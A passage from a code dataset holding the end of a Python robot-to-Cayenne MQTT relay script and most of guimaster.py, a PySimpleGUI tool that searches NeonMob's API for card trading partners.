client.begin(MQTT_USERNAME, MQTT_PASSWORD, MQTT_CLIENT_ID)
print("Done!")
# Reconnect to Cayenne every 45 seconds
def connect_cayenne_forever():
print("Keeping the connection to Cayenne...")
client.loop_forever()
#threading.Timer(45, reconnect_cayenne).start()
threading.Timer(1, connect_cayenne_forever).start()
# Micro server receing data from the Robot
class ServerClientProtocol(asyncio.Protocol):
def connection_made(self, transport):
peername = transport.get_extra_info('peername')
print('Connection from {}'.format(peername))
self.transport = transport
def data_received(self, data):
print(len(data))
print(data)
# decoding the message
message = data.decode()
print('Data received: {!r}'.format(message))
value = int(message)
print('Data decoded: {}'.format(value))
# sending the message via MQQT
# client.loop()
channel = 1
client.virtualWrite(channel, value)
# closing the client socket
print('Close the client socket')
self.transport.close()
loop = asyncio.get_event_loop()
# Each client connection will create a new protocol instance
coro = loop.create_server(ServerClientProtocol, '192.168.2.20', 6000)
server = loop.run_until_complete(coro)
# Serve requests until Ctrl+C is pressed
print('Serving on {}'.format(server.sockets[0].getsockname()))
try:
loop.run_forever()
except KeyboardInterrupt:
pass
# Close the server
server.close()
loop.run_until_complete(server.wait_closed())
loop.close()
``` |
{
"source": "jojojo8359/neonmobmatcher",
"score": 2
} |
#### File: jojojo8359/neonmobmatcher/guimaster.py
```python
import hashlib
import os
import sys
import traceback
import json
from json import JSONDecodeError
from os import path
import time
import webbrowser
import re
# pip packages
import PySimpleGUI as sg
import requests
sg.theme('DarkGrey9')
# Global variables
setdbpath = "db.json"
SETDB = []
TARGET = 0
AUTOUPDATE = True
recentpath = "recent.json"
RECENT = []
MAXRECENT = 30
SCACHE = {}
OCACHE = {}
keepalivemins = 10
# GENERAL I/O SECTION
# Database handling
def httperror(e):
"""Handles an HTTP Exception with PySimpleGUI
:param Exception e: The exception to display
"""
tb = traceback.format_exc()
sg.Print(f'An HTTP exception occurred. Here is the info:', e, tb)
sg.popup_error(f'AN HTTP EXCEPTION OCCURRED! Exiting...', e, tb)
def generalconnerror(e):
"""Handles a general connection error/exception with PySimpleGUI
:param Exception e: The exception to display
"""
tb = traceback.format_exc()
sg.Print(f'An exception occurred. Here is the info:', e, tb)
sg.popup_error(f'AN EXCEPTION OCCURRED! Exiting...', e, tb)
def fetchdb():
"""Gets the raw, most current set database file from GitHub (with connection exception handling)
:return: The raw database list
:rtype: List[Dict[str, Union[int, str, Dict[str, str]]]]
"""
try:
r = requests.request('GET', 'https://raw.githubusercontent.com/jojojo8359/neonmob-set-db/main/all-sets.json')
r.raise_for_status()
db = r.json()
return db
except requests.ConnectionError:
sg.popup_error('Connection error occurred! Exiting...')
sys.exit(1) # TODO: Rewrite error handling
except requests.exceptions.HTTPError as e:
httperror(e)
sys.exit(1)
except requests.exceptions.RequestException as e:
generalconnerror(e)
sys.exit(1)
def downloaddb():
"""Downloads and saves the latest set database in JSON form
"""
db = fetchdb()
with open(setdbpath, 'w') as f:
json.dump(db, f)
def fetchmd5():
"""Gets the raw, most current md5 hash of the set database from GitHub (with connection exception handling)
:return: The pure md5 hash of the database file
:rtype: str
"""
try:
r = requests.request('GET', 'https://raw.githubusercontent.com/jojojo8359/neonmob-set-db/main/all-sets.md5')
r.raise_for_status()
md5 = r.text
return md5.split(' ')[0]
except requests.ConnectionError:
sg.popup_error('Connection error occurred! Exiting...')
sys.exit(1)
except requests.exceptions.HTTPError as e:
httperror(e)
sys.exit(1)
except requests.exceptions.RequestException as e:
generalconnerror(e)
sys.exit(1)
def verify(truemd5):
"""Verifies a local set database file with a known md5 hash stored on GitHub
:param str truemd5: The known md5 hash from GitHub
:return: Whether or not the local hash matches the known hash
:rtype: bool
"""
try:
with open(setdbpath, 'rb') as f:
data = f.read()
returnedmd5 = hashlib.md5(data).hexdigest()
except OSError:
with open(setdbpath, 'w') as f:
f.write("[]")
return False
return truemd5 == returnedmd5
def updatedb(beannoying=True):
"""Handles updating the set database with PySimpleGUI interactions
:param bool beannoying: Whether or not to show a popup if the database is up to date
"""
if not verify(fetchmd5()):
result = sg.popup_yes_no('Database is not up to date. Download latest version?')
if result == 'Yes':
downloaddb()
if not verify(fetchmd5()):
sg.popup_error('Database is still not up to date, please update manually. https://github.com/jojojo8359/neonmob-set-db/blob/main/all-sets.json')
else:
sg.popup_ok('Database has been sucessfully updated.')
else:
if beannoying:
sg.popup_ok('Database is up to date.')
def loadSetDB():
"""Loads the set database from a file and saves it into SETDB (global variable)
"""
global SETDB
try:
with open(setdbpath, 'r') as f:
SETDB = json.load(f)
except OSError:
with open(setdbpath, 'w') as f:
f.write("[]")
SETDB = []
def searchDB(query):
"""Given a query, searches the loaded set database for instances in the name of sets
If the set database has not yet been loaded, this function will load the database
:param str query: The substring query to search the database for
:return: The list of matching results from the database
:rtype: List[Dict[Union[str, int], Union[int, str, Dict[str, str]]]]
"""
global SETDB
if not SETDB:
loadSetDB()
filtered = list(filter(lambda series: query.lower() in series['name'].lower() or query.lower() in series['name_slug'].lower(), SETDB))
# filtered = list(filter(lambda series: query.lower() in series['creator']['username'].lower() or query.lower() in series['creator']['name'].lower(), SETDB))
# Use the above to search through creator names/usernames or just `series['id']` for set ids
filtered.reverse()
return filtered
# Settings handling
def loadSettings():
"""Loads custom user settings from a file, then updates global variables
If no settings are saved, the default settings saved in this file are written into the settings file
"""
global setdbpath, MAXRECENT, keepalivemins, AUTOUPDATE
new = False
try:
with open('settings.json', 'r') as f:
saved = json.load(f)
if saved != {}:
setdbpath = saved['setdbpath']
MAXRECENT = saved['maxrecent']
keepalivemins = saved['keepalivemins']
AUTOUPDATE = saved['autoupdate']
else:
new = True
except OSError:
saveSettings()
except JSONDecodeError:
saveSettings()
if new:
saveSettings()
def saveSettings():
"""Saves custom user settings to a file by reading global variables
"""
global setdbpath, MAXRECENT, keepalivemins, AUTOUPDATE
with open('settings.json', 'w') as f:
json.dump({'setdbpath': setdbpath, 'maxrecent': MAXRECENT, 'keepalivemins': keepalivemins, 'autoupdate': AUTOUPDATE}, f)
# History/Recent Handling
def loadRecent():
"""Loads the most recent sets that were searched for from a file and saves them into RECENT (global variable)
"""
global RECENT, recentpath
try:
with open(recentpath, 'r') as f:
RECENT = json.load(f)
except OSError:
saveRecent()
except JSONDecodeError:
saveRecent()
def saveRecent():
"""Saves the MAXRECENT most recent sets after truncating to a file
"""
global RECENT, MAXRECENT, recentpath
del RECENT[MAXRECENT:]
with open(recentpath, 'w') as f:
json.dump(RECENT, f)
# Cache Handling
def loadCards(setid):
"""Loads cached card list for a specified series
:param int setid: The id of the set to load cards for
:return: A list of cards in the set or int 0 if the proper file was not found
:rtype: Union[List[Dict[str, Union[str, int]]], int]
"""
if path.exists('cache/cards/' + str(setid) + '.json'):
with open('cache/cards/' + str(setid) + '.json', 'r') as f:
cards = json.load(f)
return cards
else:
return 0
def saveCards(setid, cards):
"""Saves the card list for a specified series in cache
:param int setid: The is of the set to save cards of
:param List[Dict[str, Union[str, int]]] cards: A list of cards in the set
"""
if not path.exists('cache/'):
os.mkdir('cache/')
if not path.exists('cache/cards/'):
os.mkdir('cache/cards/')
with open('cache/cards/' + str(setid) + '.json', 'w') as f:
json.dump(cards, f)
def loadCache():
"""Loads the saved seeker and owner cache from their respective files
"""
global SCACHE, OCACHE
if not path.exists('cache/'):
os.mkdir('cache/')
if not path.exists('cache/scache.json'):
saveCache()
if not path.exists('cache/ocache.json'):
saveCache()
with open('cache/scache.json', 'r') as f:
SCACHE = json.load(f)
with open('cache/ocache.json', 'r') as f:
OCACHE = json.load(f)
def saveCache():
"""Save seeker and owner caches to their respective files
"""
global SCACHE, OCACHE
with open('cache/scache.json', 'w') as f:
json.dump(SCACHE, f)
with open('cache/ocache.json', 'w') as f:
json.dump(OCACHE, f)
def purgeCache():
"""Remove any entries from seeker and owner caches that have "expired" (based on the time limit)
"""
global SCACHE, OCACHE
loadCache()
currentMillis = int(round(time.time() * 1000))
for k in list(SCACHE.keys()):
if currentMillis - SCACHE[k]['time'] >= (keepalivemins * 60 * 1000):
del SCACHE[k]
for k in list(OCACHE.keys()):
if currentMillis - OCACHE[k]['time'] >= (keepalivemins * 60 * 1000):
del OCACHE[k]
saveCache()
def deleteCache():
"""Remove all entries from seeker and owner caches
"""
with open('cache/scache.json', 'w') as f:
json.dump({}, f)
with open('cache/ocache.json', 'w') as f:
json.dump({}, f)
# MAIN API/NETWORKING SECTION
def GetCards(setid, force=False):
"""Fetches a list of cards for any given series
:param int setid: The series id to get cards from
:param bool force: Whether or not to disregard cards stored in cache
:return: A list of cards in the given set
:rtype: List[Dict[str, Union[str, int]]]
"""
cards = loadCards(setid)
if cards != 0 and not force:
print("Card found in cache")
return cards
set_url = "https://www.neonmob.com/api/setts/" + str(setid) + "/"
data = requests.request('GET', set_url).json()
set_name = data['name']
# total = 0
# for cat in range(len(data['core_stats'])):
# total += data['core_stats'][cat]['total']
# for cat in range(len(data['special_stats'])):
# total += data['special_stats'][cat]['total']
# print("\nGetting cards from series \"" + set_name + "\"...")
cards = []
raw = requests.request('GET', "https://www.neonmob.com/api/sets/" + str(setid) + "/piece-names")
data = raw.json()
for card in data:
cards.append({'name': card['name'],
'rarity': card['rarity']['name'],
'id': card['id'],
'setName': set_name})
saveCards(setid, cards)
return cards
def GetSeekers(card, force=False):
"""Fetches a list of seekers for any given card
:param Dict[str, Union[str, int]] card: The card to search for seekers of
:param bool force: Whether or not to disregard non-expired users in the cache
:return: A list of seekers of the specified card
:rtype: List[Dict[str, Union[int, float, str, List[Dict[str, Union[str, int]]]]]
"""
global SCACHE, SEARCHING
purgeCache()
if card['id'] == -1:
print("\nCouldn't find card " + card['name'] + " in set " + card['setName'])
return []
currentMillis = int(round(time.time() * 1000))
if str(card['id']) in SCACHE.keys() and not force:
print("Card is in cache")
if currentMillis - SCACHE[str(card['id'])]['time'] < (keepalivemins * 60 * 1000):
print("Time is under 10 minutes")
return SCACHE[str(card['id'])]['seekers']
# print("\nGetting seekers of " + card['name'] + " [" + str(card['id']) + "]...")
seekers = []
data = requests.request('GET', "https://www.neonmob.com/api/pieces/" + str(card['id']) + "/needers/?completion=desc&grade=desc&wishlisted=desc").json()
total = data['count']
i = 0
canceled = False
while True:
if canceled:
break
nxt = data['next']
for seeker in data['results']:
seekers.append({'id': seeker['id'],
'name': seeker['name'],
'trader_score': seeker['trader_score'],
'wants': [
{
'card_id': card['id'],
'card_name': card['name'],
'set_name': card['setName'],
'rarity': card['rarity'],
'wishlisted': seeker['wishlisted'],
'total_specials': seeker['special_piece_count'],
'specials': seeker['owned_special_piece_count'],
'percentage': seeker['owned_percentage']
}
],
'owns': []
})
i += 1
if not sg.one_line_progress_meter("Fetching seekers...", i, total, "Getting seekers of " + card['name'] + " [" + str(card['id']) + "]...", orientation='h', key='-SEEKERBAR-'):
canceled = True
break
if not nxt:
break
data = requests.request('GET', "https://www.neonmob.com" + nxt).json()
if len(seekers) != total:
SEARCHING = False
return -1
try:
SCACHE.pop(str(card['id']))
except KeyError:
print("Card is not in cache")
currentMillis = int(round(time.time() * 1000))
SCACHE.update({card['id']: {'time': currentMillis, 'cardName': card['name'], 'setName': card['setName'], 'seekers': seekers}})
saveCache()
return seekers
def GetOwners(card, force=False):
"""Fetches a list of owners for any given card
:param Dict[str, Union[str, int]] card: The card to search for owners of
:param bool force: Whether or not to disregard non-expired users in the cache
:return: A list of owners of the specified card
:rtype: List[Dict[str, Union[int, float, str, List[Dict[str, Union[str, int]]]]]
"""
global OCACHE, SEARCHING
purgeCache()
if card['id'] == -1:
print("\nCouldn't find card " + card['name'] + " in set " + card['setName'])
return []
currentMillis = int(round(time.time() * 1000))
if str(card['id']) in OCACHE.keys() and not force:
print("Card is in cache")
if currentMillis - OCACHE[str(card['id'])]['time'] < (keepalivemins * 60 * 1000):
print("Time is under 10 minutes")
return OCACHE[str(card['id'])]['owners']
# print("\nGetting owners of " + card['name'] + " [" + str(card['id']) + "]...")
owners = []
data = requests.request('GET', "https://www.neonmob.com/api/pieces/" + str(card['id']) + "/owners/?completion=asc&grade=desc&owned=desc").json()
total = data['count']
i = 0
canceled = False
while True:
if canceled:
break
nxt = data['next']
for owner in data['results']:
owners.append({'id': owner['id'],
'name': owner['name'],
'trader_score': owner['trader_score'],
'owns': [
{
'card_id': card['id'],
'card_name': card['name'],
'set_name': card['setName'],
'rarity': card['rarity'],
'print_count': owner['print_count'],
'total_specials': owner['special_piece_count'],
'specials': owner['owned_special_piece_count'],
'percentage': owner['owned_percentage']
}
],
'wants': []
})
i += 1
if not sg.one_line_progress_meter('Fetching owners...', i, total, "Getting owners of " + card['name'] + " [" + str(card['id']) + "]...", orientation='h', key='-OWNERBAR-'):
canceled = True
break
if not nxt:
break
data = requests.request('GET', "https://www.neonmob.com" + nxt).json()
if len(owners) != total:
SEARCHING = False
return -1
try:
OCACHE.pop(str(card['id']))
except KeyError:
print("Card is not in cache")
currentMillis = int(round(time.time() * 1000))
OCACHE.update({card['id']: {'time': currentMillis, 'cardName': card['name'], 'setName': card['setName'], 'owners': owners}})
saveCache()
return owners
# DATA PROCESSING SECTION
def processSets(results):
"""Process set results to be displayed in the set selection window
:param List[Dict[str, Union[int, str, Dict[str, str]]]] results: A list of raw set results
:return: A list of processed results in table form
:rtype: List[Union[str, int]]
"""
rows = []
for item in results:
if item['edition_size'] == 'unlimited':
char = '∞'
else:
char = 'LE'
name = item['name']
emoji_pattern = re.compile("["
u"\U0001F600-\U0001F64F" # emoticons
u"\U0001F300-\U0001F5FF" # symbols & pictographs
u"\U0001F680-\U0001F6FF" # transport & map symbols
u"\U0001F1E0-\U0001F1FF" # flags (iOS)
"]+", flags=re.UNICODE)
rows.append([emoji_pattern.sub(r'', name), item['creator']['name'], char, item['id']])
return rows
def processCards(results):
"""Process card results to be displayed in the card selection window
:param List[Dict[str, Union[str, int]]] results: A list of raw card results
:return: A list of processed results in table form
:rtype: List[List[Union[str, int]]]
"""
rows = []
for item in results:
rows.append([item['rarity'], item['name'], item['setName'], item['id']])
return rows
def processResults(results):
"""Process trade search results to be displayed in the results window
:param List[Dict[str, Union[int, str, float, List[Dict[str, Union[str, int]]]]]] results: A list of raw trade search results
:return: A list of processed results in table form
:rtype: List[List[Union[str, int]]]
"""
rows = []
for person in results:
rows.append([person['name'], parseTraderGrade(person['trader_score']),
len(person['owns']), len(person['wants']), person['id']])
return rows
def parseTraderGrade(grade):
"""Converts a decimal trader grade into a text representation (defined by NeonMob)
:param float grade: The decimal trader grade to convert
:return: The text representation of the given trader grade
:rtype: str
"""
grades = ['F', 'F+', 'D-', 'D', 'D+', 'C-', 'C', 'C+', 'B-', 'B', 'B+', 'A-', 'A', 'A+']
return grades[int(grade)]
def combinePeople(nestedlist1, nestedlist2):
"""Combines all people (dictionaries) from two lists, merging data along the way
For example, if a person is found once in both given lists, the cards they own and need will be combined into one person object and included in the result
:param List[List[Dict[str, Union[int, str, float, List[Dict[str, Union[int, str]]]]]]] nestedlist1: The first list of raw people data
:param List[List[Dict[str, Union[int, str, float, List[Dict[str, Union[int, str]]]]]]] nestedlist2: The second list of raw people data
:return: A list of unique people whose attributes have been combined
:rtype: List[Dict[str, Union[int, str, float, List[Dict[str, Union[int, str]]]]]]
"""
master = []
allids = []
list1 = []
for larg in nestedlist1:
list1.extend(larg)
for larg in nestedlist2:
list1.extend(larg)
for person in list1:
if person['id'] not in allids:
master.append(person)
allids.append(person['id'])
else:
currentindex = [i for i, t in enumerate(master) if t['id'] == person['id']][0]
currentperson = master[currentindex]
for i in range(len(person['owns'])):
check = True
for j in range(len(currentperson['owns'])):
if person['owns'][i]['card_name'] == currentperson['owns'][j]['card_id']:
check = False
if check:
currentperson['owns'].append(person['owns'][i])
for i in range(len(person['wants'])):
check = True
for j in range(len(currentperson['wants'])):
if person['wants'][i]['card_name'] == currentperson['wants'][j]['card_id']:
check = False
if check:
currentperson['wants'].append(person['wants'][i])
return master
def getCommons(people, owned, want, mode='and', checkprintcount=False):
"""Finds users who have and want specific cards
:param List[Dict[str, Union[int, str, float, List[Dict[str, Union[int, str]]]]]] people: A list of people to search through
:param List[int] owned: A list of user-owned card ids to check
:param List[int] want: A list of user-wanted card ids to check
:param str mode: 'and' will require all card conditions to be met, while 'or' requires at least one card condition on each side of the trade to be met
:param bool checkprintcount: Whether or not to include users with single copies (False will search for singles, True will not)
:return: A list of users who meet the conditions specified
:rtype: List[Dict[str, Union[int, str, float, List[Dict[str, Union[int, str]]]]]]
"""
master = []
if mode == 'and':
for person in people:
mastercheck = True
if len(person['owns']) == 0 or len(person['wants']) == 0:
continue
# print("Person does not have empty lists")
for ownedid in owned:
cardcheck = False
for ownedcard in person['owns']:
if checkprintcount and ownedcard['print_count'] < 2:
break
elif ownedid == ownedcard['card_id']:
cardcheck = True
break
if not cardcheck:
mastercheck = False
break
for wantedid in want:
cardcheck = False
for wantedcard in person['wants']:
if wantedid == wantedcard['card_id']:
cardcheck = True
break
if not cardcheck:
mastercheck = False
break
if mastercheck:
master.append(person)
elif mode == 'or':
for person in people:
mastercheck = False
printcheck = True
if len(person['owns']) == 0 or len(person['wants']) == 0:
continue
for ownedid in owned:
cardcheck = False
for ownedcard in person['owns']:
if checkprintcount and ownedcard['print_count'] >= 2:
printcheck = False
if ownedid == ownedcard['card_id']:
cardcheck = True
break
if cardcheck:
mastercheck = True
for wantedid in want:
cardcheck = False
for wantedcard in person['wants']:
if wantedid == wantedcard['card_id']:
cardcheck = True
break
if cardcheck:
mastercheck = True
if mastercheck and not printcheck:
master.append(person)
return master
# GUI SECTION
defaultsets = [['', '', '', '']]
defaultcards = [['', '', '']]
defaultcards2 = [['', '', '', '']]
defaultpeople = [['', '', '', '']]
def make_mainwindow():
"""Builds the main window where the user creates a search query
:return: Built window (finalized)
:rtype: PySimpleGUI.Window
"""
table1 = [[sg.Table(defaultsets, num_rows=10, key='-TABLE1-', headings=['Rarity', 'Card Name', 'Set Name', 'id'],
col_widths=[10, 30, 30, 9], auto_size_columns=False, justification='left',
visible_column_map=[True, True, True, False])]]
table2 = [[sg.Table(defaultsets, num_rows=10, key='-TABLE2-', headings=['Rarity', 'Card Name', 'Set Name', 'id'],
col_widths=[10, 30, 30, 9], auto_size_columns=False, justification='left',
visible_column_map=[True, True, True, False])]]
column1 = [[sg.Button('+', key='-OTHERADD-')],
[sg.Button('-', key='-OTHERREMOVE-')],
[sg.Button('C', key='-OTHERCLEAR-')]]
column2 = [[sg.Button('+', key='-YOUADD-')],
[sg.Button('-', key='-YOUREMOVE-')],
[sg.Button('C', key='-YOUCLEAR-')]]
frame1 = [[sg.Column(table1), sg.Column(column1)]]
frame2 = [[sg.Column(table2), sg.Column(column2)]]
if sys.platform == 'darwin':
menu = sg.Menu([['&File', ['Settings', '---', 'Update Database', 'Purge Cache', '---', 'E&xit']]])
else:
menu = sg.Menu([['&File', ['Settings', '---', 'Update Database', 'Purge Cache', '---', 'E&xit']]],
background_color='#FFFFFF', text_color='#000000')
layout = [[menu],
[sg.Frame(layout=frame1, title="Cards I'm seeking from someone else"), sg.Frame(layout=frame2, title="Cards I want to trade away")],
[sg.Button('Search', key='-SEARCHBUTTON-'), sg.Checkbox('Force Refresh', default=False, key='-REFRESH-'),
sg.Combo(['And', 'Or'], 'And', key='-MODE-', readonly=True), sg.Checkbox('2+ Prints', default=True, key='-PRINTS-')]]
window = sg.Window('NeonMobMatcher v1.0.0', layout, finalize=True, resizable=True)
# window.maximize()
return window
def make_setwindow():
"""Builds the set selection window
:return: Built window (finalized)
:rtype: PySimpleGUI.Window
"""
global RECENT, TARGET
if not RECENT:
loadRecent()
if TARGET == 0:
target_text = "Another Person Has:"
else:
target_text = "You Have:"
layout = [[sg.Input(size=(30, 1), enable_events=True, key='-INPUT-', tooltip='Search for a set by name', focus=True)],
[sg.Table(RECENT, num_rows=15, key='-SETTABLE-', headings=['Set Name', 'Author', ' ', 'id'],
col_widths=[30, 20, 3, 8], auto_size_columns=False, justification='left',
visible_column_map=[True, True, True, False], bind_return_key=True)],
[sg.Button('OK'), sg.Button('Cancel')]]
window = sg.Window('Set Selection | ' + target_text, layout, finalize=True)
return window
def make_cardwindow(setid):
"""Builds the card selection window
:param int setid: The id of the set to show cards for
:return: Built window (finalized)
:rtype: PySimpleGUI.Window
"""
global TARGET
if TARGET == 0:
target_text = "Another Person Has:"
else:
target_text = "You Have:"
layout = [[sg.Table(defaultcards, num_rows=15, key='-CARDTABLE-',
headings=['Rarity', 'Card Name', 'Set Name', 'id'], col_widths=[10, 30, 30, 9],
auto_size_columns=False, justification='left', visible_column_map=[True, True, False, False],
right_click_menu=['&Right', ['Sort By Rarity', 'Sort By Name']], select_mode=sg.TABLE_SELECT_MODE_EXTENDED)],
[sg.Button('OK'), sg.Button('Cancel'), sg.Button('Refresh'),
sg.Combo(['Common', 'Uncommon', 'Rare', 'Very Rare', 'Extra Rare', 'Chase', 'Variant'], key='-RARITY-', readonly=True),
sg.Button('Add All of Rarity')]]
window = sg.Window('Card Selection | ' + target_text, layout, finalize=True)
new_rows = processCards(GetCards(setid))
window['-CARDTABLE-'].update(new_rows)
return window
def make_resultwindow(results):
"""Builds the search results window
:param List[Dict[str, Union[int, str, float, List[Dict[str, Union[int, str]]]]]] results: A list of raw trade search results
:return: Built window (finalized)
:rtype: PySimpleGUI.Window
"""
table1 = [[sg.Table(defaultcards2, num_rows=10, key='-OWNTABLE-',
headings=['Rarity', 'Card Name', 'Set Name', 'Prints', 'id'], col_widths=[10, 20, 20, 5, 9],
auto_size_columns=False, justification='left',
visible_column_map=[True, True, True, True, False],
right_click_menu=['&Right', ['Option 1', 'Option 2']], enable_events=True)]]
table2 = [[sg.Table(defaultcards2, num_rows=10, key='-WANTTABLE-',
headings=['Rarity', 'Card Name', 'Set Name', 'Wishlisted', 'id'], col_widths=[10, 20, 20, 8, 9],
auto_size_columns=False, justification='left',
visible_column_map=[True, True, True, True, False],
right_click_menu=['&Right', ['Option 1', 'Option 2']])]]
frame1 = [[sg.Column(table1)]]
frame2 = [[sg.Column(table2)]]
layout = [[sg.Table(defaultpeople, num_rows=15, key='-PEOPLETABLE-',
headings=['Name', 'Grade', 'Have', 'Want', 'id'], col_widths=[20, 5, 5, 5, 9],
auto_size_columns=False, justification='left',
visible_column_map=[True, True, True, True, False],
right_click_menu=['&Right', ['Option 1', 'Option 2']], enable_events=True)],
[sg.Frame(layout=frame1, title="___ Has:", key='-OTHERFRAME-'),
sg.Frame(layout=frame2, title="You Have:")],
[sg.Button('OK'), sg.Button('Open User Profile'), sg.Text('', key='-PRINTNUMS-')]]
window = sg.Window('Results', layout, finalize=True)
new_rows = processResults(results)
window['-PEOPLETABLE-'].update(new_rows)
return window
def make_settingswindow():
"""Builds the settings window
:return: Built window (finalized)
:rtype: PySimpleGUI.Window
"""
# Database
# Cache
# History
column1 = sg.Column([[sg.Text('Set DB Path (must end in .json):'), sg.InputText(setdbpath, key='-SETDBPATH-')],
[sg.Checkbox('Auto-update DB on startup?', key='-AUTOUPDATE-', default=AUTOUPDATE)]])
column2 = sg.Column([[sg.Text('Cache keep-alive time (minutes):'), sg.InputText(str(keepalivemins), key='-KEEPALIVE-')]])
column3 = sg.Column([[sg.Text('Maximum recent sets to remember:'), sg.InputText(str(MAXRECENT), key='-MAXRECENT-')]])
frame1 = [[column1]]
frame2 = [[column2]]
frame3 = [[column3]]
layout = [[sg.Frame(layout=frame1, title='Database')],
[sg.Frame(layout=frame2, title='Cache')],
[sg.Frame(layout=frame3, title='History')],
[sg.Button('OK'), sg.Button('Cancel')]]
window = sg.Window('Settings', layout, finalize=True)
return window
items1 = []
items2 = []
SETID = 0
RESULTS = []
SEARCHING = False
# MAIN EVENT LOOP
def main():
global TARGET, SETID, RESULTS, RECENT, setdbpath, MAXRECENT, keepalivemins, AUTOUPDATE, SEARCHING
loadSettings()
window1, window2, window3, window4, settingswindow = make_mainwindow(), None, None, None, None
updatedb(beannoying=False) # Please don't be annoying on startup :)
while True:
window, event, values = sg.read_all_windows()
print(event, values)
if window == window1 and event in (sg.WIN_CLOSED, 'Exit'): # Close the program if main window is closed or File -> Exit is selected
break
# Main window
if event == 'Settings' and not SEARCHING: # From File menu
settingswindow = make_settingswindow()
continue
elif event == 'Update Database' and not SEARCHING: # From File menu
updatedb()
elif event == 'Purge Cache' and not SEARCHING: # From File menu
if sg.popup_yes_no("Are you sure you want to purge the cache? Loading times will be significantly impacted.") == 'Yes':
purgeCache()
sg.popup("Cache successfully purged!")
if event == '-SEARCHBUTTON-':
if not SEARCHING:
SEARCHING = True
window['-SEARCHBUTTON-'].update(disabled=True)
window['-REFRESH-'].update(disabled=True)
window['-MODE-'].update(disabled=True)
window['-PRINTS-'].update(disabled=True)
if window4 is not None: # If results from a previous search are still on the screen, kill that window to begin the next search
window4.close()
window4 = None
if window3 is not None: # If the user is still searching through cards, close that window to begin the search
window3.close()
window3 = None
if window2 is not None: # If the user is still searching through sets, close that window to begin the search
window2.close()
window2 = None
if settingswindow is not None: # If the user is changing settings, close that window to begin the search
settingswindow.close()
settingswindow = None
# print(items1)
# print(items2)
if len(items1) == 0 or len(items2) == 0:
sg.popup_error("Please add items to both lists")
else:
canceled = False
owners = []
for card in items1:
carddict = {'name': card[1], 'rarity': card[0], 'id': card[3], 'setName': card[2]}
newowners = GetOwners(carddict, force=values['-REFRESH-'])
if newowners == -1:
canceled = True
break
else:
owners.append(newowners)
seekers = []
if not canceled:
for card in items2:
carddict = {'name': card[1], 'rarity': card[0], 'id': card[3], 'setName': card[2]}
newseekers = GetSeekers(carddict, force=values['-REFRESH-'])
if newseekers == -1:
canceled = True
break
else:
seekers.append(newseekers)
if canceled:
sg.popup("Search was canceled.")
else:
combined = combinePeople(owners, seekers)
filtered = getCommons(combined, [x[3] for x in items1], [x[3] for x in items2], mode=values['-MODE-'].lower(), checkprintcount=values['-PRINTS-'])
RESULTS = filtered
# print(filtered)
window4 = make_resultwindow(RESULTS)
SEARCHING = False
window['-SEARCHBUTTON-'].update(disabled=False)
window['-REFRESH-'].update(disabled=False)
window['-MODE-'].update(disabled=False)
window['-PRINTS-'].update(disabled=False)
continue
# Left side (other person)
if event == '-OTHERADD-' and not SEARCHING: # Start searching for user-owned cards
if window2 is not None:
window2.ding()
window2.bring_to_front()
elif window3 is not None:
window3.ding()
window3.bring_to_front()
else:
TARGET = 0
window2 = make_setwindow()
continue
elif event == '-OTHERREMOVE-' and not SEARCHING: # Remove user-owned card from trade list
try:
items1.pop(values['-TABLE1-'][0])
except IndexError:
pass
window1['-TABLE1-'].update(items1)
elif event == '-OTHERCLEAR-' and not SEARCHING: # Clear user-owned card list
if sg.popup_yes_no("Really clear?") == 'Yes':
items1.clear()
window1['-TABLE1-'].update(items1)
# Right side (you)
elif event == '-YOUADD-' and not SEARCHING: # Start searching for user-wanted cards
if window2 is not None:
window2.ding()
window2.bring_to_front()
elif window3 is not None:
window3.ding()
window3.bring_to_front()
else:
TARGET = 1
window2 = make_setwindow()
continue
elif event == '-YOUREMOVE-' and not SEARCHING: # Remove user-wanted cards from trade list
try:
items2.pop(values['-TABLE2-'][0])
except IndexError:
pass
window1['-TABLE2-'].update(items2)
elif event == '-YOUCLEAR-' and not SEARCHING: # Clear user-wanted card list
if sg.popup_yes_no("Really clear?") == 'Yes':
items2.clear()
window1['-TABLE2-'].update(items2)
# Set window
if window == window2 and event in (sg.WIN_CLOSED, 'Cancel'): # Close the set selection window if it is closed or Exit is pressed
window2.close()
window2 = None
continue
if window == window2 and values['-INPUT-'] != '': # Update search results when a character is typed in the search box
search = values['-INPUT-']
new_values = searchDB(search)
new_rows = processSets(new_values)
window['-SETTABLE-'].update(new_rows)
elif window == window2: # If nothing is in the search box, display recent sets
if not RECENT:
loadRecent()
window['-SETTABLE-'].update(RECENT)
if window == window2 and (event == 'OK' or event == '-SETTABLE-') and len(values['-SETTABLE-']): # Move on to card selection if OK is pressed or a set is selected or double-clicked
selected = window['-SETTABLE-'].get()[values['-SETTABLE-'][0]]
if selected in RECENT:
RECENT.remove(selected)
RECENT.insert(0, selected)
saveRecent()
SETID = selected[3]
window3 = make_cardwindow(SETID)
window2.close()
window2 = None
continue
# Card window
if window == window3 and event in (sg.WIN_CLOSED, 'Cancel'): # Close the card selection window if it is closed or Exit is pressed
window3.close()
window3 = None
continue
if window == window3 and event == 'Add All of Rarity' and values['-RARITY-'] != '': # If 'Add All of Rarity' is pressed and a rarity is selected, add all cards of the selected rarity to the main window
current_rows = window['-CARDTABLE-'].get()
rarity_cards = []
for row in current_rows:
if row[0] == values['-RARITY-']:
rarity_cards.append(row)
if TARGET == 0:
items1.extend(rarity_cards)
window1['-TABLE1-'].update(items1)
else:
items2.extend(rarity_cards)
window1['-TABLE2-'].update(items2)
window3.close()
window3 = None
continue
elif window == window3 and event == 'OK' and len(values['-CARDTABLE-']): # If OK is pressed and at least 1 card is selected, add the card(s) to the main window
indexes = values['-CARDTABLE-']
items = window['-CARDTABLE-'].get()
selected = []
for index in indexes:
selected.append(items[index])
if TARGET == 0:
items1.extend(selected)
window1['-TABLE1-'].update(items1)
else:
items2.extend(selected)
window1['-TABLE2-'].update(items2)
window3.close()
window3 = None
continue
elif window == window3 and event == 'Refresh': # Re-download card data and refresh the window when Refresh is pressed
new_rows = processCards(GetCards(SETID, force=True))
window['-CARDTABLE-'].update(new_rows)
elif window == window3 and event == 'Sort By Rarity': # Sorts the card list by rarity when the table is right-clicked
current_rows = window['-CARDTABLE-'].get()
new_rows = []
for rarity in ['Common', 'Uncommon', 'Rare', 'Very Rare', 'Extra Rare', 'Chase', 'Variant']:
for row in current_rows:
if row[0] == rarity:
new_rows.append(row)
window['-CARDTABLE-'].update(new_rows)
elif window == window3 and event == 'Sort By Name': # Sorts the card list by name when the table is right-clicked
